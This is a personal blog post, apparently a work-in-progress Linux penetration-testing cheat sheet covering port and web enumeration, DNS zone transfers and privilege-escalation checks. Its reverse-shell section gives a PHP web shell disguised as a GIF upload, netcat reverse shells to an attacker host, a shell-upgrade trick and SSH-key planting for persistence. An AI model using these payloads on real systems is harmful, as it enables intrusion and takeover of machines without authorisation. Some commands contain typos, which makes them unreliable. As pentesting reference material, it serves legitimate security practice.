WIP – Linux pentest cheatsheet

Marghost

Intended for personal use, i use many websites and pages from my blog, i just want to have all those things into one cozy page.

Enumeration

Port

­nmap

Simple quick and dirt with os and version detection :

[code]nmap -A -O -v -T4 X.X.X.X[/code]

A more complete one :

[code]nmap -sV -sC -oA tcpnmap X.X.X.X[/code]

Custom one to see if there is some special ports :

[code]nmap -A -O -v -T4 –top-ports 5000 -oA tcptop5000nmap X.X.X.X[/code]

UDP :

[code]nmap -sU -oA udpnmap X.X.X.X[/code]

P.S. -p- to scan all ports (take a break and go make a sandwich)

Webservice

Nikto

[code]nikto -h X.X.X.X[/code]

Uniscan

[code]uniscan -u http://X.X.X.X/ -qweds[/code]

Dirbuster

Start de gui :

[code]dirbuster[/code]

most used list :

[code]/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt[/code]

Dirb

[code]dirb http://X.X.X.X /usr/share/dirb/wordlists/common.txt[/code]

(also big.txt is interesting)

Dirsearch

[code]git clone http://github.com/maurosoria/dirsearch
python3 dirsearch.py -u http://X.X.X.X -e php -w /usr/share/wordlists/dirbuster/directory-lit-2.3-medium.txt -f -t 20[/code]

-f force extention
-r (recursive if needed)

Wpscan

[code]wpscan –url http://X.X.X.X/wordpress –enumerate u vp vt[/code]

droopescan

Up to date drupal scanner
[code]droopescan scan drupal -u X.X.X.X[/code]

Burp

Enum4linux

For extensive enum. enum4linux :
[code]enum4linux -a -o -n -v X.X.X.X[/code]

DNS

NSLOOKUP

[code]nslookup
>SERVER X.X.X.X
>127.0.0.1
Server: …
Address: …
>X.X.X.X
Server: …
Address: …
>box.com
Server: …
Address: …

Name: box.com
Address:X.X.X.X[/code]

dnsrecon

Reverse lookup brute force:

[code]dnsrecon -r 127.0.0.0/24 -n X.X.X.X[/code]

[code]dnsrecon -r 127.0.1.0/24 -n X.X.X.X[/code]

[code]dnsrecon -r X.X.X.0/24 -n X.X.X.X[/code]

dns zone transfer

Reverse lookup brute force:

[code]dig axfr @X.X.X.X[/code]

We can get few extra subdomains/domainfiles :

[code]dig axfr [email protected][/code]

add a dns server

edit :

[code]/etc/resolf.conf
nammeserver X.X.X.X[/code]

Reverse Shell

To test

gif to upload to test
[code]GIF8 <?php echo system($_REQUEST[‘command’]); ?>[/code]
[code]xxxx.gif?command=id[/code]
If it works
[code]xxxx.gif?command=nc -e /bin/sh KALIIP 8081
[/code]

netcat

TCP

On kali box : nc -lvnp 8081
[code]nc -e /bin/sh KALIIP 8081[/code]

UDP

**(need to check -e -u)***
On kali box : nc -u -lvnp 8081
[code]nc -e -u /bin/sh KALIIP 8081[/code]

To have full shell :
[code]python -c ‘import pty;pty.spawn(“/bin/bash”);'[/code]
Background with CTRL+Z
[code]stty raw -echo
fg [enter][/code]
(sometime you need to enter the command bash)

Create ssh keyset

[code]ssh-keygen
PATH : /root/ssh_key[/code]
and the key generated need to be put inside the server
[code]/home/user/.ssh/authorized_keys[/code]
to connect :
[code]ssh -i ssh_key [email protected][/code]

Usefull links:

Reverse Shell Cheat Sheet

Privilege Escalation

LinEnum.sh

linuxprivchecher.py

unixprivesc.sh

sudo info

to see if user can run command as sudo :
[code]sudo -l[/code]
to see the version of sudo
[code]dpkg -l sudo[/code]

Grab exploit directly from searchsploit :
[code]searchsploit -x (put the path)[/code]

Leave a Reply

Your email address will not be published. Required fields are marked *